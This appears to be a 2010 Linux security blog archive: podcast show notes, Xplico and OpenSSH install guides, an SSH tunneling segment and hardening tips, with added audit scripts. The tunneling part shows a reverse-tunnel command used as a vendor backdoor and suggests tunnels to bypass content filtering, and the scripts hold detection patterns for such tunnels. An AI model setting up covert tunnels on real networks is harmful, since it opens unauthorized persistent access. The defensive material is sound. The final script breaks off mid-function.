Category: Linux

Sep 16 2010

Second time’s a charm “Linux Kernel 0-day bug”

I am sure by noon today you will see lots more technology blogs talking about this old but yet new bug. “The Linux kernel has been purged of a bug that gave root access to untrusted users – again.”

Background:

The vulnerability in a component of the operating system that translates values from 64 bits to 32 bits (and vice versa) was fixed once before – in 2007 with the release of version 2.6.22.7. But several months later, developers inadvertently rolled back the change, once again leaving the OS open to attacks that allow unprivileged users to gain full root access.


The bug was originally discovered by the late hacker Wojciech “cliph” Purczynski. But Ben Hawkes, the researcher who found the kernel regression, said that he grew suspicious when he recently began tinkering under the hood of the open-source OS and saw signs the flaw was still active. Read the complete article over at The Register.

A sample exploit is already in the wild, as shown at http://seclists.org/fulldisclosure/2010/Sep/268 . Since I am not an expert in exploit development or analysis, I will sit back and wait for the guys over at Metasploit or SET to whip something up so I can test.

Sep 04 2010

Notes for Linux Basix Eps20

I appeared on the Linux Basix podcast once more; I am becoming a regular :). Below are some of the things I spoke about during my segment.

Discussion Links:

  1. Symantec Snoop Dogg rap contest site rickrolled: Symantec’s attempt to link up with Snoop Dogg and launch a cybercrime rap contest was meant to raise awareness of the issue; however, it turned out that the site itself had several vulnerabilities and had to be taken down for maintenance. Read more over at http://www.theregister.co.uk/2010/09/03/symantec_rap_contest_farce/.
  2. Facebook adds new remote log-out security feature: Facebook on Thursday announced a new security feature that will allow users to see if they are logged into their accounts on a different computer and to remotely log out if so. This can also be used to see if someone has your password and has been logging in when you are not around. The new security feature follows a Login Notification feature the company announced in May that lets users tell Facebook to notify them via e-mail or SMS when a new computer or device is used to log into their account. Read more over at http://news.cnet.com/8301-27080_3-20015482-245.html .
  3. Rosetta Stone for Unix: The goal of this site is to give you a command syntax comparison between Linux, Unix, Mac OS X, and a few others; visit http://bhami.com/rosetta.html and have some fun. Another good site with a collection of Unix/Linux/BSD commands is –> http://cb.vu/unixtoolbox.xhtml which gives you the option to save the page as a PDF ebook.
  4. Malware hosted on Google Code project site: Malicious individuals are using the Google Code repository to host Trojan horses, backdoors and password-stealing keyloggers, according to researchers at Zscaler. The researchers found a malicious project hosted on the free Google Code site with 50+ malware executables stored in the download section of the project. “The first malicious file was uploaded on June 24, 2010 and was still active at the end of August this year, proving that Google is slow to find and remove malicious projects”. Read more over at http://www.zdnet.com/blog/security/malware-hosted-on-google-code-project-site/7247

Tech Segment: Installing and using Xplico

What is Xplico?

The goal of Xplico is to extract the application data contained in an Internet traffic capture. For example, from a pcap file Xplico extracts each email (POP, IMAP and SMTP), all HTTP content, each VoIP call (SIP), FTP and TFTP transfers, and so on. Xplico is not a network protocol analyzer; it is an open source Network Forensic Analysis Tool (NFAT).

Features

  • Protocols supported: HTTP, SIP, IMAP, POP, SMTP, TCP, UDP, IPv6, …;
  • Port Independent Protocol Identification (PIPI) for each application protocol (the decoder is chosen by inspecting the payload rather than by trusting the port number);
  • Multithreading;
  • Output data and information to a SQLite or MySQL database and/or to files;
  • Each item of data reassembled by Xplico has an associated XML file that uniquely identifies the flow and the pcap containing the reassembled data;
  • Real-time processing (speed depends on the number of flows, the protocols involved and the machine: RAM, CPU, disk access time, …);
  • TCP reassembly with ACK verification for every packet, or “soft” ACK verification;
  • Reverse DNS lookup from the DNS packets contained in the input files (pcap), not from an external DNS server;
  • No size limit on input data or on the number of input files (the only limit is disk size);
  • IPv4 and IPv6 support;
  • Modularity: each Xplico component is a module; the input interface, the protocol decoders (dissectors) and the output interface (dispatcher) are all modules;
  • The ability to easily create any kind of dispatcher with which to organize the extracted data in the way most appropriate and useful to you.

Installing and Configuring:

First begin with a little sudo fu and install the following packages:

apt-get install tcpdump tshark apache2 php5 php5-sqlite build-essential perl zlib1g-dev libpcap-dev libsqlite3-dev php5-cli libapache2-mod-php5 libx11-dev libxt-dev libxaw7-dev python-all sqlite3 recode sox lame libnet1 libnet1-dev libmysqlclient15-dev

Create a temp directory to wget your files to: mkdir Xbuild && cd Xbuild

Download the Xplico source code from SourceForge or BerliOS, then unpack it:

tar zxvf xplico-0.5.x.tgz

wget http://geolite.maxmind.com/download/geoip/api/c/GeoIP-1.4.6.tar.gz
tar zxvf GeoIP-1.4.6.tar.gz

cd GeoIP-1.4.6
./configure
make

cd ..
rm -f *.tar.gz

cd xplico-0.5.x
wget http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz
gzip -d GeoLiteCity.dat.gz
rm -f *dat.gz
make

cd ..
wget http://mirror.cs.wisc.edu/pub/mirrors/ghost/GPL/ghostpdl/ghostpdl-8.70.tar.bz2
tar jxvf ghostpdl-8.70.tar.bz2

ghostpdl provides the pcl6 program, which Xplico needs in order to render captured network printer jobs (PCL).

rm -f *.bz2
cd ghostpdl-8.70
make

This build takes a while.

cd ..
cp ghostpdl-8.70/main/obj/pcl6 xplico-0.5.x
rm -rf ghostpdl-8.70

Download videosnarf from http://ucsniff.sourceforge.net/videosnarf.html. Note for 64-bit architectures: some codec libraries are proprietary and 32-bit only; the only solution in that case is described at http://forum.xplico.org/viewtopic.php?p=453#p453

wget http://downloads.sourceforge.net/project/ucsniff/videosnarf/videosnarf-0.63.tar.gz
tar xvzf videosnarf-0.63.tar.gz
cd videosnarf-0.63
./configure
make
cd ..
cp videosnarf-0.63/src/videosnarf xplico-0.5.x

Install Xplico

cd xplico-0.5.x
make install

Copy Apache configuration file

cp /opt/xplico/cfg/apache_xi /etc/apache2/sites-enabled/xplico

After this we have to add the port used by the Xplico Interface (XI) to the Apache ports file. In /etc/apache2/ports.conf add:

# xplico Host port
NameVirtualHost *:9876
Listen 9876

We must also modify php.ini to allow uploading (pcap) files. Edit /etc/php5/apache2/php.ini and set:

post_max_size = 100M
upload_max_filesize = 100M

Enable mode rewrite in Apache:

a2enmod rewrite

And finally restart Apache:

/etc/init.d/apache2 restart

You can find much more information and documentation on the wiki –> http://wiki.xplico.org.

Uploading your first PCAP file:

  1. Log into the user interface at http://<xplico-ip>:9876
  2. Username: xplico, password: xplico. Change it after the first login, and keep port 9876 reachable only from the analyst network: every uploaded capture, and everything Xplico reconstructs from it, sits behind that one login.
  3. Click on Case to create a new case.
  4. Click on Session to create a new session.
  5. Click on the newly created session within the newly created case, click Upload, and browse to your capturefile.pcap.
  6. You can also create a live-capture session and have the host sit there passively listening.

Sit back, wait for Xplico to work its magic and then browse your results. View this page to see screenshots of all the various options in Xplico –> http://wiki.xplico.org/doku.php?id=web_interface. Now all you have to do is go sniffing, read the manual and have fun viewing your results.

Aug 28 2010

Notes for Linux Basix Eps019

The post below is just a quick write-up that can serve as an addition to the show notes for my segment on the Linux Basix podcast.

Discussion Links:

  1. Gmail made you look like a spammer this week –> Graham Cluley’s blog. Over 4 million Gmail users had their email messages sent multiple times. “At least if your home or business computer was spewing out spam you can pull the cable out of the back of your PC. With web-based services like Gmail you don’t have that option.”
  2. http://blog.commandlinekungfu.com/ and http://shelldorado.com/shelltips/beginner.html –> Great blogs for learning the command line; keep reading and you will be a command line ninja one day.
  3. http://garinkilpatrick.com/21-wicked-wordpress-plugins/ –> Tons of interesting plug-ins for you to have fun with.
  4. http://www.cyberciti.biz/tips/top-linux-monitoring-tools.html –> 20 Linux System Monitoring Tools Every SysAdmin Should Know; with over 143 comments, a must read.

Installing OpenSSH 5.6

Now, in keeping with my theme of always keeping your software updated, I noticed that a new version of OpenSSH was released on August 24th. Why update, you might ask?

Here is the list of features that may change your mind:

Changes since OpenSSH 5.5
=========================
Features:

* Added a ControlPersist option to ssh_config(5) that automatically
starts a background ssh(1) multiplex master when connecting. This
connection can stay alive indefinitely, or can be set to
automatically close after a user-specified duration of inactivity.

* Hostbased authentication may now use certificate host keys. CA keys
must be specified in a known_hosts file using the @cert-authority
marker as described in sshd(8).

* ssh-keygen(1) now supports signing certificate using a CA key that
has been stored in a PKCS#11 token.

* ssh(1) will now log the hostname and address that we connected to at
LogLevel=verbose after authentication is successful to mitigate
“phishing” attacks by servers with trusted keys that accept
authentication silently and automatically before presenting fake
password/passphrase prompts.

Note that, for such an attack to be successful, the user must have
disabled StrictHostKeyChecking (enabled by default) or an attacker
must have access to a trusted host key for the destination server.

* Expand %h to the hostname in ssh_config Hostname options. While this
sounds useless, it is actually handy for working with unqualified
hostnames:

Host *.*
Hostname %h
Host *
Hostname %h.example.org

* Allow ssh-keygen(1) to import (-i) and export (-e) of PEM and PKCS#8
keys in addition to RFC4716 (SSH.COM) encodings via a new -m option
(bz#1749)

* sshd(8) will now queue debug messages for bad ownership or
permissions on the user’s keyfiles encountered during authentication
and will send them after authentication has successfully completed.
These messages may be viewed in ssh(1) at LogLevel=debug or higher.

* ssh(1) connection multiplexing now supports remote forwarding with
dynamic port allocation and can report the allocated port back to
the user:

LPORT=`ssh -S muxsocket -R0:localhost:25 -O forward somehost`

* sshd(8) now supports indirection in matching of principal names
listed in certificates. By default, if a certificate has an
embedded principals list then the username on the server must match
one of the names in the list for it to be accepted for
authentication.

sshd(8) now has a new AuthorizedPrincipalsFile option to specify a
file containing a list of names that may be accepted in place of the
username when authorizing a certificate trusted via the
sshd_config(5) TrustedCAKeys option. Similarly, authentication
using a CA trusted in ~/.ssh/authorized_keys now accepts a
principals=”name1[,name2,...]” to specify a list of permitted names.

If either option is absent, the current behaviour of requiring the
username to appear in principals continues to apply. These options
are useful for role accounts, disjoint account namespaces and
“user@realm”-style naming policies in certificates.

* Additional sshd_config(5) options are now valid inside Match blocks:

AuthorizedKeysFile
AuthorizedPrincipalsFile
HostbasedUsesNameFromPacketOnly
PermitTunnel

* Revised the format of certificate keys. The new format, identified as
ssh-{dss,rsa}-cert-v01@openssh.com includes the following changes:

- Adding a serial number field. This may be specified by the CA at
the time of certificate signing.

- Moving the nonce field to the beginning of the certificate where
it can better protect against chosen-prefix attacks on the
signature hash (currently infeasible against the SHA1 hash used)

- Renaming the “constraints” field to “critical options”

* Adding a new non-critical “extensions” field. The “permit-*”
options are now extensions, rather than critical options to
permit non-OpenSSH implementation of this key format to degrade
gracefully when encountering keys with options they do not
recognize.

The older format is still supported for authentication and may still
be used when signing certificates (use “ssh-keygen -t v00 …”).
The v00 format, introduced in OpenSSH 5.4, will be supported for at
least one year from this release, after which it will be deprecated
and removed.

Install time…

I am attempting to install this on a headless Ubuntu server, so the first command I am going to try is:

# sudo apt-get install openssh-server openssh-client

Since this is a brand-new release, a plain apt-get install does not get you 5.6: distribution repositories lag upstream, and a stable Ubuntu release generally keeps the OpenSSH version it shipped with and only receives backported security fixes.

Obtaining your copy…

Just do a quick wget

wget http://filedump.se.rit.edu/pub/OpenBSD/OpenSSH/portable/openssh-5.6p1.tar.gz

Prerequisites
—————-

You will need working installations of Zlib and OpenSSL.

Zlib 1.1.4 or 1.2.1.2 or greater (earlier 1.2.x versions have problems):
http://www.gzip.org/zlib/

OpenSSL 0.9.6 or greater:
http://www.openssl.org/

Building / Installation
————————–
To install OpenSSH with default options:

./configure
make
make install

While I was waiting with excitement for my new app to build and install, I kept getting the following error: “configure: error: *** OpenSSL headers missing – please install first or check config.log ***”

Decided to upgrade to Ubuntu 10.04 instead:

  1. Install update-manager-core if it is not already installed:
    sudo apt-get install update-manager-core
  2. Edit /etc/update-manager/release-upgrades and set Prompt=normal
  3. Launch the upgrade tool:
    sudo do-release-upgrade
  4. Follow the on-screen instructions.

Only to realize that the fix was to install the libssl-dev package

apt-get install libssl-dev

Other useful commands I used:

uname -a –> Prints the kernel version and other basic information about the system

ssh -V –> Shows the OpenSSH version number, plus the OpenSSL version it was built against (note the capital V; lowercase -v turns on verbose debugging output instead)

cat /etc/issue –> Shows your Ubuntu release

Lastly you can take a read of my posting on the DLL hijacking issue if you haven’t been following it.

Links:

http://www.openssh.com/txt/release-5.6

ftp://ftp.ca.openbsd.org/pub/OpenBSD/OpenSSH/portable/INSTALL

Aug 24 2010

Linux Basix Eps017 Tech Segment

I appeared on the Linux Basix podcast a few weeks ago but since I was out of the country for a while I am now getting around to posting the show notes for my segment.

Information Security news in the world of Linux:

A security issue affects the following Ubuntu releases:
– Ubuntu 9.04
– Ubuntu 9.10
– Ubuntu 10.04 LTS

  • Brief Details:

It was discovered that the PC/SC service did not correctly handle malformed messages. A local attacker could exploit this to execute arbitrary code with root privileges. In short, update your system NOW!

Dell Latitude 2110 vulnerability –> https://lists.ubuntu.com/archives/ubuntu-security-announce/2010-August/001135.html

A security issue affects the following Ubuntu releases:

  • Ubuntu 9.10
  • Ubuntu 10.04 LTS

  • Brief Details:

It was discovered that the Ubuntu image shipped on some Dell Latitude 2110 systems was accidentally configured to allow unauthenticated package installations. A remote attacker intercepting network communications, or a malicious archive mirror server, could exploit this to trick the user into installing unsigned packages, resulting in arbitrary code execution with root privileges.

Segment Title: SSH tunneling for good or evil!

What is SSH –

Secure Shell or SSH is a network protocol that allows data to be exchanged using a secure channel between two networked devices.

How to install/Setup SSH?

First be sure to install the most recent version; as of yesterday that is OpenSSH 5.6.

sudo apt-get install ssh (or build it from source, as in the previous post)

  • Then do a quick test by trying to SSH into your own machine: ssh localhost
  • Then of course you can always edit /etc/ssh/sshd_config and do things like force protocol version 2, deny root login, and so on.

What is tunneling?

Tunneling, also known as “port forwarding,” is the transmission of data intended for use only within a private, usually corporate network through a public network in such a way that the routing nodes in the public network are unaware that the transmission is part of a private network

Various types of tunneling protocols:

  • HTTP
  • ICMP
  • DNS
  • SSH

    SSH tunneling how it works: Nice Youtube video to get you started –> http://www.youtube.com/watch?v=EUplDL4hSuc

    When can you use this?

    • For good –> You can use this to create a SOCKS5 proxy (ssh -D) to securely tunnel your web traffic, for instance when you are at a free Wi-Fi hot spot.
    • Or if you want to bypass some content filtering that is in place to block you from accessing certain websites.
    • Securely tunnel your IM chat or email, which by default are both clear-text protocols.

    Examples:

    Tunneling Gtalk traffic –> ssh -f -N user@myhomeserver.com -L 3000:talk.google.com:5222 (then point the IM client at localhost:3000)

    Tunneling Email –> ssh -f -N user@myhomeserver.com -L 2000:personal-server.com:25 (then point the mail client at localhost:2000)

    • For evil –> http://infolookup.securegossip.com/2010/05/13/keeping-an-eye-on-your-vendors/. “Reverse SSH tunneling”: as you would expect, if tunneling is getting past a firewall in the forward direction, reverse tunneling is getting access to an inside host by going out and coming back in. I linked to a posting I did back in May about an incident I had to track down and remediate.
      • In short, a vendor of ours had a Linux-based appliance on the inside of our network with a pre-configured “stealthy reverse tunnel” that would give them access to that system at any time without our assistance.
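The forward tunnels from the examples above and the reverse tunnel the “for evil” item describes, side by side, followed by the defender’s half: a small script that spots ssh clients that are forwarding ports. This is an added example, not code from the original post or from the Linux Basix segment. The host names, the 203.0.113.10 address, the ports and the process listing are placeholders and constructed input, and the function names (`classify_ssh_cmdline`, `scan_ps_listing`) are chosen here.

```bash
#!/bin/sh
# Added example, not from the original post. Placeholders: myhomeserver.com,
# 203.0.113.10 (a documentation address), vendor@, and all port numbers.
#
# The forward tunnels from the text, and the reverse form used "for evil":
#   ssh -f -N -L 3000:talk.google.com:5222 user@myhomeserver.com  # local: localhost:3000 -> talk.google.com:5222
#   ssh -f -N -D 1080 user@myhomeserver.com                       # SOCKS5 proxy on localhost:1080
#   ssh -f -N -R 2222:localhost:22 vendor@203.0.113.10            # reverse: run ON the inside host;
#       its own sshd becomes reachable on port 2222 of the outside machine,
#       through the outbound connection the firewall already allows.
#
# Defender side: find ssh clients that are forwarding anything, from a
# `ps -eo user,pid,args --no-headers` listing.

add_kind() {
  # Append $1 to KINDS unless it is already present.
  case " $KINDS " in *" $1 "*) ;; *) KINDS="$KINDS $1" ;; esac
}

classify_ssh_cmdline() {
  # $1: one process command line. Prints "none" if it is not an ssh/autossh
  # client (sshd's own "-D" means "do not daemonize" and must not count),
  # "plain" for a client that forwards nothing, otherwise the kinds found,
  # joined with "+": reverse (-R / RemoteForward), socks (-D / DynamicForward),
  # local (-L / LocalForward). Heuristic: only -o settings and single-dash
  # flag clusters are inspected, so forwards set in ~/.ssh/config are not seen,
  # and an argument fused to its flag (e.g. -F/root/Downloads) can give a false
  # hit. Review hits before acting on them.
  set -f; set -- $1; set +f                 # split on whitespace, no globbing
  case "${1:-}" in
    ssh|*/ssh|autossh|*/autossh) ;;
    *) echo none; return 0 ;;
  esac
  shift
  KINDS=""; prev=""
  for w in "$@"; do
    # "-o RemoteForward=..." arrives as two words; glue them back together.
    if [ "$prev" = "-o" ]; then w="-o$w"; fi
    prev="$w"
    case "$w" in
      -o[Rr]emote[Ff]orward=*)  add_kind reverse ;;
      -o[Dd]ynamic[Ff]orward=*) add_kind socks ;;
      -o[Ll]ocal[Ff]orward=*)   add_kind local ;;
      -o*|--*) ;;                           # other options carry no forwarding
      -*)                                   # flag cluster: -R, -fNR, -R2222:...
        case "$w" in *R*) add_kind reverse ;; esac
        case "$w" in *D*) add_kind socks ;; esac
        case "$w" in *L*) add_kind local ;; esac ;;
      *) ;;                                 # host, port spec, remote command
    esac
  done
  if [ -n "$KINDS" ]; then
    printf '%s\n' "${KINDS# }" | tr ' ' '+'
  else
    echo plain
  fi
}

scan_ps_listing() {
  # stdin: ps output, one process per line as "user pid args...".
  # Prints "pid user kinds" for every ssh client that is forwarding ports.
  while read -r user pid args; do
    kinds=$(classify_ssh_cmdline "$args")
    case "$kinds" in
      none|plain) ;;
      *) echo "$pid $user $kinds" ;;
    esac
  done
}

sample_ps_listing() {
  # Constructed listing: a vendor-style reverse tunnel, a SOCKS proxy, the
  # Gtalk forward, two non-ssh processes (sshd's -D is the trap), an autossh
  # reverse tunnel written with -o, and a plain interactive session.
  cat <<'EOF'
root      1234 /usr/bin/ssh -f -N -R 2222:localhost:22 vendor@203.0.113.10
bob       2345 ssh -D 1080 bob@home.example.org
alice     3456 ssh -L 3000:talk.google.com:5222 alice@myhomeserver.com
www-data  4567 /usr/sbin/apache2 -k start
root      5678 /usr/sbin/sshd -D
root      6789 autossh -M 0 -o RemoteForward=2222:localhost:22 -N vendor@203.0.113.10
dave      7890 ssh dave@jumphost
EOF
}

# On a live host:  ps -eo user,pid,args --no-headers | scan_ps_listing
```

Run on the appliance itself this would have shown the vendor’s tunnel as a root-owned ssh process carrying -R; run on a jump host it shows who is proxying through it. It is a process-level check only: a tunnel started from a cron job or autossh reappears after you kill it, so the cron entries and the remote side’s authorized_keys are the next things to look at.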

    Reference Links

    https://secure.wikimedia.org/wikipedia/en/wiki/Secure_Shell

    https://calomel.org/firefox_ssh_proxy.html

    https://help.ubuntu.com/community/SSH/OpenSSH/Configuring
    http://www.howtogeek.com/howto/ubuntu/setup-openssh-server-on-ubuntu-linux/

    http://searchenterprisewan.techtarget.com/sDefinition/0,,sid200_gci213230,00.html

    Jul 29 2010

    Linux Basix Security Tips Part 1

    A while back I hinted to the wonderful guys over at http://www.linuxbasix.com/ that I would like to appear on the show and do a segment on Linux security; they agreed, and below are some notes you can use to follow along with my segment.

    Disclaimer: I am by no means a Linux security expert; I am just trying to bring some visibility to a topic that I believe all new users should think about.

    Taken from the Linux basix website, our goal here is to bring together information that will make your introduction to Linux and Open Source Software more enjoyable and productive. As we go along we will be constantly updating this site with our shows and show notes. If you have any questions please post comments to the shows and blog. Feel free to let us know what you think of the show and we will do our best to make it make as much sense as possible. Once the forum is up and running it will be a source to find answers, tips and tricks to make computing more enjoyable.

    The goal of my segment is not to touch on anything too advanced; for that you can find several Linux hardening guides from CERT, the NSA and many other resources out there. Instead I will focus on a few tips that anyone new to Linux should keep in mind before connecting their server or workstation to the Internet.

    I would like to start by sharing a few sentences I found in a blog posting over at computer world;

    “You see Windows was designed as a single-user, non-networked operating system. That design is still at the heart of Windows, which is why security must always be an add-on to Windows. Linux, in contrast, was built from the ground up as a multi-user, networked system. Linux, like Unix, which came before it, was constructed to work in a world with hostile users.”

    Physical Security ( might seem silly but this should always be considered)

    Configure the BIOS to disable booting from CDs/DVDs and external devices, and set a password to protect these settings; you can go a step further by encrypting the entire drive. Next, set a password for the GRUB bootloader (the steps below are for GRUB Legacy; GRUB 2, as shipped with recent Ubuntu releases, uses grub-mkpasswd-pbkdf2 and the scripts in /etc/grub.d instead).

    • Generate a password hash using /usr/sbin/grub-md5-crypt.
    • Add the hash to the global section at the top of /boot/grub/menu.lst (before the first title entry) as follows: password --md5 passwordhash

    Keep the install as minimal as possible

    Take a moment to think about your installation. I understand you might not know exactly what you want, but don’t install everything at first: do the basics, and as you learn more you can install the additional applications and do it properly. Also remove unnecessary packages, keep only the ones you need, and lastly remove any accounts that are not needed.

    # yum list installed
    # yum list packageName
    # yum remove packageName

    OR

    # dpkg --list
    # dpkg -s packageName
    # apt-get remove packageName

    Stay away from clear-text protocols

    Under no circumstances do you want to use a clear-text protocol. Any of the following protocols or programs (telnet, rsh, rlogin, FTP, TFTP) hand your username and password to anyone on your local network with a packet sniffer. If you are hosting a website or providing users with a login portal, make sure you are not using plain HTTP but HTTPS, even if you have to generate your own self-signed certificate.

    Identify all open ports and services

    It’s important to know which ports you have open and which services are behind them, so you can decide whether to block or filter them with a firewall. It also gives you a baseline: if you later notice a new open port, you have something to compare it to.

    To do this you can use a tool like Nmap (“Network Mapper”), a free and open source utility for network exploration and security auditing. Many system and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Scan from another machine as well as from localhost: a scan of 127.0.0.1 also lists services bound only to the loopback interface, which are not reachable from the network.

    ex nmap -A -sV 127.0.0.1

    You can also use the following to identify and turn off unwanted services (chkconfig and service are the Red Hat-style tools; Debian/Ubuntu use update-rc.d and the /etc/init.d scripts instead):

    To view all services that are turned on in runlevel 3:
    # chkconfig --list | grep '3:on'

    To disable a service:

    # service serviceName stop
    # chkconfig serviceName off

    Security software

    • Install antivirus software. I am aware that Linux is not as prone to viruses as your average Windows PC, but don’t for a moment think that Linux is not being successfully exploited in the wild every day. You want to ensure that you are not the “low hanging fruit”; in short, don’t be the easy target.
    • Install and configure a host firewall (iptables) and a mandatory access control system (SELinux or AppArmor, depending on your distribution), and take a moment to read how to configure them. They are not the same thing: the firewall filters network traffic, while SELinux/AppArmor confine what a process may do once it is running.

    Keep Your Software Up to Date

    • Configure your system to update from your software repository and apply updates automatically. Security updates should be applied as soon as possible.
    • Create the file apt.cron, make it executable, place it in /etc/cron.daily or /etc/cron.weekly, and ensure that it reads as follows:

    #!/bin/sh
    /usr/bin/apt-get update
    /usr/bin/apt-get -y upgrade

    Or, with aptitude, use aptitude -y safe-upgrade (note that aptitude -s safe-upgrade only simulates the upgrade and changes nothing).

    Password policy

    • Ensure that you have a proper password policy: first identify any user account that has an empty password and either set one or remove the account.
    • Set up password aging; rotate passwords at least every 60 days.
    • Set up some sort of lockout policy: if someone attempts a brute-force attack you need to at least slow them down, and a common practice is to lock an account after 3 failed login attempts.

      To get password expiration information, enter:
      chage -l userName

      To see failed login attempts, enter:
      faillog

      To unlock an account after login failures, run:
      faillog -r -u userName

      Note that you can also use the passwd command to lock and unlock accounts:
      # lock account
      passwd -l userName

      # unlock account
      passwd -u userName

      To identify accounts with empty passwords, type the following command:
      # awk -F: '($2 == "") {print}' /etc/shadow

    Make Sure No Non-Root Accounts Have UID Set To 0

    Only the root account should have UID 0, which gives full access to the system. Type the following command to display all accounts with UID set to 0:

    # awk -F: '($3 == "0") {print}' /etc/passwd

    You should only see one line as follows:
    root:x:0:0:root:/root:/bin/bash

    If you see other lines, delete them or make sure other accounts are authorized by you to use UID 0.

    File and file system security

    SUID and SGID files on your system are a potential security risk and should be monitored closely. Because these programs run with the privileges of their owner or group rather than those of the user executing them, it is necessary to ensure that insecure ones are not installed. A favorite trick of crackers is to exploit a SUID-root program, then leave a SUID program behind as a back door to get in next time, even if the original hole is plugged.

    • Find all SUID/SGID programs on your system and keep a list of them, so you notice any change that could indicate an intruder. Use the following command to find all SUID/SGID programs on your system:

    root# find / -type f \( -perm -04000 -o -perm -02000 \)

    World-writable files, particularly system files, can be a security hole if a cracker gains access to your system and modifies them. World-writable directories are just as dangerous, since they allow a cracker to add or delete files as he wishes (for example, to upload malware to a web site and infect its visitors).

    To locate all world-writable directories that lack the sticky bit (the bit that keeps /tmp safe, since it stops users deleting each other’s files), use the following command:

    find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print

    Secure ssh remote access

    • Disable root login via ssh. If someone is going to try to brute-force your ssh server, the first user name they will try is root, so ensure that you do not allow ssh login for the root user. You can verify or change this by editing the config file:

    vi /etc/ssh/sshd_config

    Find the section containing the line with “PermitRootLogin” in it. In a stock file it often looks like this; note that every one of these lines is commented out, so none of them is in effect:

    #LoginGraceTime 2m
    #PermitRootLogin no
    #StrictModes yes
    #MaxAuthTries 6

    Remove the leading # from the PermitRootLogin line (or add an uncommented one above it) so that it reads PermitRootLogin no. sshd uses the first uncommented occurrence of a keyword and ignores any later ones, so check that no earlier line already sets it to yes.

    Then restart your SSH service with sudo /etc/init.d/ssh restart on Debian/Ubuntu (the init script is called sshd on Red Hat-style systems).
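A check for the trap above (a PermitRootLogin line that is still commented out, or a second occurrence that sshd never reads), as an added example rather than anything from the original post: `sshd_effective` prints the value sshd will actually use for a keyword, `sshd_set_global` rewrites the global setting, and the sshd_config sample is constructed. The function names and the assumption of the “Keyword value” spelling (sshd_config also accepts “Keyword=value”, which is not handled here) are mine, not sshd’s.

```bash
#!/bin/sh
# Added example (not from the original post). sshd_config(5) takes the FIRST
# uncommented occurrence of a keyword and ignores later ones, and a
# "#PermitRootLogin no" line is only a comment, so editing the wrong line
# leaves root login enabled. Settings inside a Match block are conditional
# and are not treated as the global value here.

sshd_effective() {
  # $1: sshd_config path, $2: keyword (case-insensitive).
  # Prints the global value sshd would use, or "unset" when the keyword never
  # appears uncommented before the first Match block (the built-in default
  # then applies; for PermitRootLogin that default is "yes").
  # Assumes the "Keyword value" spelling, not "Keyword=value".
  awk -v key="$2" '
    { sub(/#.*/, "") }                           # strip comments; $0 is re-split
    NF == 0 { next }                             # blank / comment-only line
    tolower($1) == "match" { inmatch = 1 }       # everything after is conditional
    inmatch { next }
    tolower($1) == tolower(key) && !found { found = 1; print $2 }
    END { if (!found) print "unset" }
  ' "$1"
}

sshd_set_global() {
  # $1: sshd_config path, $2: keyword, $3: value.
  # Prints a rewritten config in which every global setting of the keyword is
  # removed and a single "keyword value" line is placed before the first Match
  # block (or appended if there is none). Comment lines are left alone.
  # Redirect the output to a new file, diff it against the original, then move
  # it into place and restart sshd.
  awk -v key="$2" -v val="$3" '
    !inmatch && tolower($1) == "match" { if (!done) { print key, val; done = 1 }; inmatch = 1 }
    !inmatch && tolower($1) == tolower(key) { next }
    { print }
    END { if (!done) print key, val }
  ' "$1"
}

sample_sshd_config() {
  # Constructed sample reproducing the trap: the "no" on the third line is a
  # comment, the first live value is "yes", the later "no" is ignored by sshd,
  # and the Match block only applies to one user.
  cat <<'EOF'
# constructed sample sshd_config
Port 22
#PermitRootLogin no
PermitRootLogin yes
Protocol 2
PermitRootLogin no
Match User backup
    PermitRootLogin without-password
EOF
}

# Usage on a live host:
#   sshd_effective /etc/ssh/sshd_config PermitRootLogin
#   sshd_set_global /etc/ssh/sshd_config PermitRootLogin no > /tmp/sshd_config.new
```

After rewriting, `sshd -t -f /tmp/sshd_config.new` validates the syntax before you replace the real file, and keeping your existing session open while you restart sshd means a mistake cannot lock you out.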

    Unowned files

    Files not owned by any existing user or group can pose a security problem; they are typically left behind when an account is removed. Find the ones that do not belong to a valid user and a valid group with the following command:

    find /dir -xdev \( -nouser -o -nogroup \) -print
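The account and file-system checks from this segment (empty passwords, UID 0 accounts, SUID/SGID programs, world-writable directories and files, unowned files) written as functions that take the file or directory to inspect as a parameter, so the same code runs against a constructed sample tree or against /etc and /. This is an added example, not code from the original post; the function names and the sample passwd/shadow contents are constructed here, and `find_world_writable_files` adds the file variant that the directory-only command above does not cover.

```bash
#!/bin/sh
# Added example (not from the original post): the checks from this segment as
# reusable functions. Point them at /etc/passwd, /etc/shadow and / on a live
# host, or at the constructed sample from make_sample_tree for a dry run.

find_uid0_accounts() {
  # Every account whose UID is 0; on a clean system this prints only "root".
  awk -F: '$3 == 0 { print $1 }' "$1"
}

find_empty_passwords() {
  # Accounts whose shadow entry has an empty password field (field 2).
  # Locked ("!" / "*") and hashed entries are not empty and are skipped.
  awk -F: '$2 == "" { print $1 }' "$1"
}

find_suid_sgid() {
  # SUID (4000) or SGID (2000) regular files below $1; -xdev stays on one
  # file system so network mounts and /proc are not walked.
  find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print
}

find_world_writable_dirs() {
  # World-writable directories WITHOUT the sticky bit (1000): anyone can delete
  # or rename other users' files there. A 1777 /tmp is sticky and is skipped.
  find "$1" -xdev -type d -perm -0002 ! -perm -1000 -print
}

find_world_writable_files() {
  # World-writable regular files; the segment's own command only covered
  # directories, this complements it.
  find "$1" -xdev -type f -perm -0002 -print
}

find_unowned() {
  # Files whose UID or GID no longer maps to a passwd/group entry.
  find "$1" -xdev \( -nouser -o -nogroup \) -print
}

make_sample_tree() {
  # Builds a constructed sample (passwd, shadow and a few files with
  # deliberately bad modes) in a temp directory and prints its path.
  d=$(mktemp -d) || return 1
  cat > "$d/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
toor:x:0:0:second uid 0 account:/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
EOF
  cat > "$d/shadow" <<'EOF'
root:$6$saltsalt$hashhashhash:15000:0:99999:7:::
daemon:*:15000:0:99999:7:::
toor::15000:0:99999:7:::
alice:!:15000:0:99999:7:::
EOF
  mkdir -p "$d/bin" "$d/dropbox" "$d/tmp"
  : > "$d/bin/su";        chmod 4755 "$d/bin/su"        # SUID
  : > "$d/bin/wall";      chmod 2755 "$d/bin/wall"      # SGID
  : > "$d/bin/ls";        chmod 0755 "$d/bin/ls"        # normal binary
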